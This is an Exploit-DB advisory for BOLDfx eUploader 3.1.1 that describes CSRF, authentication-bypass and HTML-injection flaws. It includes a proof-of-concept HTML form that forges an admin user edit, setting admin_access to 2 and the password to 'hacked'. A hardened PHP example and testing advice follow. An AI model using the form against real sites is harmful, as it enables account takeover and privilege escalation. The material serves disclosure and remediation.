- 34,644
- 0
- 18 Dec 2022
- EDB-ID: 34351
- EDB Verified: Passed
- Author: MILOS ZIVANOVIC
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: N/A
- Publication date: 2009-12-16
BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities
HTML:
source: https://www.securityfocus.com/bid/41783/info
BOLDfx eUploader is prone to multiple remote vulnerabilities, including a cross-site request-forgery vulnerability, a security-bypass vulnerability, and an HTML-injection vulnerability.
Attacker-supplied HTML and script code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user. A remote attacker may also be able to perform certain administrative actions without proper authentication; other attacks are also possible.
eUploader PRO 3.1.1 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/admin.php?page=user&id=[ID]" method="post">
  <input type="hidden" name="id" value="[ID]">
  <input type="hidden" name="admin_access" value="2">
  <input type="hidden" name="email" value="[email protected]">
  <input type="hidden" name="pass" value="hacked">
  <input type="hidden" name="pass2" value="hacked">
  <input type="submit" name="edit" value="Submit">
</form>
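The proof-of-concept above works because the user-edit handler accepts a cross-site POST, does not check that the caller is an authenticated administrator, and reflects submitted values without escaping. The following PHP sketch is an added example written for this page; it is not eUploader's code and assumes a hypothetical `admin.php?page=user` handler in which `admin_access` level 2 denotes an administrator (taken from the PoC) and a hypothetical `update_user()` persistence call. It shows the three controls that close the classes of issue in the advisory: an authorization gate, a per-session CSRF token compared with `hash_equals()`, and output escaping with `htmlspecialchars()`.

```php
<?php
// Added example, not part of eUploader 3.1.1: a hardened sketch of an
// admin "edit user" handler covering the three issue classes in the advisory.

// Cookie flags limit cross-site submission (SameSite) and script access (HttpOnly).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

// 1. Security bypass: refuse any edit unless the session belongs to an administrator.
//    Assumption: admin_access >= 2 means administrator (the PoC sets this value).
function require_admin(): void
{
    if (empty($_SESSION['user_id']) || (int)($_SESSION['admin_access'] ?? 0) < 2) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// 2. CSRF: a random per-session token that every state-changing form must echo back.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function verify_csrf(): void
{
    $known = $_SESSION['csrf_token'] ?? '';
    $sent  = $_POST['csrf_token'] ?? '';
    // Reject when no token was ever issued; hash_equals('', '') would otherwise pass.
    if ($known === '' || !is_string($sent) || !hash_equals($known, $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

// 3. HTML injection: escape every user-controlled value before it reaches the page.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

require_admin();

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit'])) {
    verify_csrf();

    $id    = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT);
    $email = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);
    $pass  = $_POST['pass'] ?? '';
    $pass2 = $_POST['pass2'] ?? '';

    // Privilege level is never taken from the request; only an explicit,
    // separately authorized action may change it.
    if ($id === false || $id === null || $email === false || $email === null
        || !is_string($pass) || $pass === '' || $pass !== $pass2) {
        http_response_code(400);
        exit('Bad request');
    }

    $hash = password_hash($pass, PASSWORD_DEFAULT); // never store the cleartext password
    // update_user($id, $email, $hash);             // hypothetical persistence call
    echo 'Updated user ' . e((string)$id);
    exit;
}

// The edit form embeds the token; a form hosted on another origin cannot know it.
$id = (string)($_GET['id'] ?? '');
?>
<form action="admin.php?page=user&amp;id=<?= e($id) ?>" method="post">
  <input type="hidden" name="csrf_token" value="<?= e(csrf_token()) ?>">
  <input type="hidden" name="id" value="<?= e($id) ?>">
  <label>Email <input type="email" name="email"></label>
  <label>Password <input type="password" name="pass"></label>
  <label>Repeat <input type="password" name="pass2"></label>
  <input type="submit" name="edit" value="Submit">
</form>
```

When testing a fix like this, submit the PoC form from a different origin against a session that is logged in: the request must be rejected with 403 before any database write, the response must not contain the submitted values unescaped, and a non-administrator session must be rejected even when the token is valid.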
- Source
- www.exploit-db.com